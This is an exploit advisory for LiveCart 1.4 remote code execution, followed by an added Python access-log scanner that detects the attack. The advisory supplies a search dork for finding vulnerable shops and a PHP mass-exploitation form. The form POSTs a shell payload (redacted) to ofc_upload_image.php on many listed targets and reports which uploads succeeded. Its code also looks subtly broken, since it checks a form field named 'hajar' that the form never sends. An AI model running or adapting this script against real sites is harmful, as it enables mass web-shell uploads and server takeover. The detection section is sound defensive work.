LiveCart 1.4 Remote Code Execution

2013.10.24
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#Title : LiveCart 1.4 Remote Code Execution
#Author : DevilScreaM
#Date : 10/23/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://livecart.com
#Download : http://livecart.com/download
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerability : Remote Code Execution
#Dork : intext:Powered by LiveCart & USE YOUR BRAIN

Vuln : http://site-target/library/openFlashChart/ofc_upload_image.php

Reference : https://github.com/integry/livecart/blob/master/library/openFlashChart/ofc_upload_image.php

Exploit and Script

<?
@set_time_limit(0);
// One target base URL per line of the submitted textarea
$site = explode("\r\n", $_POST['target']);
$filename = $_POST['name'];
$path = array('/library/openFlashChart/ofc_upload_image.php');
$result = array("/library/tmp-upload-images/");
// Body of the POST request
$shell = base64_decode("[base64-encoded payload removed]");
$options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $shell));
$context = stream_context_create($options);
if($_POST['hajar']) {
    foreach($site as $target) {
        foreach($path as $upload) {
            // Request the upload script with the chosen file name
            $fopen = @fopen("{$target}{$upload}?name={$filename}", 'r', false, $context);
        }
        foreach($result as $results) {
            // Fetch the file back from the upload directory
            $url = "{$target}{$results}{$filename}";
            $check = @file_get_contents($url);
            if(eregi("0day-id.php.php", $check)) {
                echo "<font face='Tahoma' size='2'>[+] Sh3ll Uploaded => {$target}/{$results}/{$filename} <br />";
                flush();
            }
        }
    }
}
?>
<title>0day-id.com | LiveCart Remote Code Execution</title>
<form method='POST'>
<input type='text' name='name' value='0day-id.php'>
<input type='submit' value='Exploit' name='Exploit'><br>
<textarea name='target' cols='60' rows='20'></textarea>
</form>
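
For defenders, the request pattern in the script above (a POST to ofc_upload_image.php carrying the file name in ?name=, followed by a fetch from /library/tmp-upload-images/) can be searched for in web server access logs. The following is an added example, not part of the original advisory; the Combined Log Format, the extension list and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths as given in the advisory, lower-cased for matching.
UPLOAD_PATH = "/library/openflashchart/ofc_upload_image.php"
RESULT_DIR = "/library/tmp-upload-images/"
# Assumption: extensions a PHP-enabled server might execute; tune per site.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)
# Assumption: Combined Log Format, ip - user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return findings as (kind, client_ip, filename, status) tuples."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path).lower()
        if method == "POST" and path.endswith(UPLOAD_PATH):
            # The destination file name travels in the ?name= query parameter.
            for name in parse_qs(url.query).get("name", []):
                kind = "script-upload" if SCRIPT_EXT.search(name) else "upload"
                findings.append((kind, ip, name, int(status)))
        elif RESULT_DIR in path:
            # A script requested from the upload directory.
            name = path.rsplit("/", 1)[-1]
            if SCRIPT_EXT.search(name):
                findings.append(("script-fetch", ip, name, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [24/Oct/2013:10:01:02 +0000] "POST /library/openFlashChart/ofc_upload_image.php?name=test.php HTTP/1.0" 200 57',
    '203.0.113.7 - - [24/Oct/2013:10:01:03 +0000] "GET /library/tmp-upload-images/test.php HTTP/1.0" 200 312',
    '198.51.100.4 - - [24/Oct/2013:10:05:00 +0000] "POST /shop/library/openFlashChart/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 57',
    '198.51.100.4 - - [24/Oct/2013:10:05:09 +0000] "GET /library/tmp-upload-images/chart.png HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```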

References:

https://github.com/integry/livecart/blob/master/library/openFlashChart/ofc_upload_image.php

